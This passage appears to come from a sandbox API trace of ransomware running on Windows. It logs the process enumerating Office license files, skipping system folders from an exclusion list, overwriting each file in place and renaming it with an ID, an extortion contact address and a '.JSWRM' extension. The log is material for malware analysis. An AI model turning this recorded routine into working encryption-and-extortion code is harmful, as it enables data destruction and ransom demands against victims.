RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0111.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0111.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.141] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebaf2760, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebaf2760, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebbd758f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTest-pl.xrm-ms", cAlternateFileName="VI293A~1.XRM")) returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.141] lstrcmpiW (lpString1="VisioProCO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0111.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0111.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0111.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0111.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.142] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0111.143] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.143] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.171] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.171] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.171] CloseHandle (hObject=0x45c) returned 1 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0111.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0111.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.172] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0111.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.173] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebe86003, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebe86003, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebf6ae01, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51ba, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTest-ppd.xrm-ms", cAlternateFileName="VID4F4~1.XRM")) returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.177] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.178] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0111.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.179] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20922) returned 1 [0111.179] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0111.179] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0111.183] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.183] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0111.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.184] CloseHandle (hObject=0x45c) returned 1 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0111.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0111.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0111.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0111.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.184] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.186] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeba59def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeba59def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebb3ec46, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d67, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="VISIOP~2.XRM")) returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.186] lstrcmpiW (lpString1="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0111.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.187] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11623) returned 1 [0111.187] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.187] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.192] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.192] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.192] CloseHandle (hObject=0x45c) returned 1 [0111.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 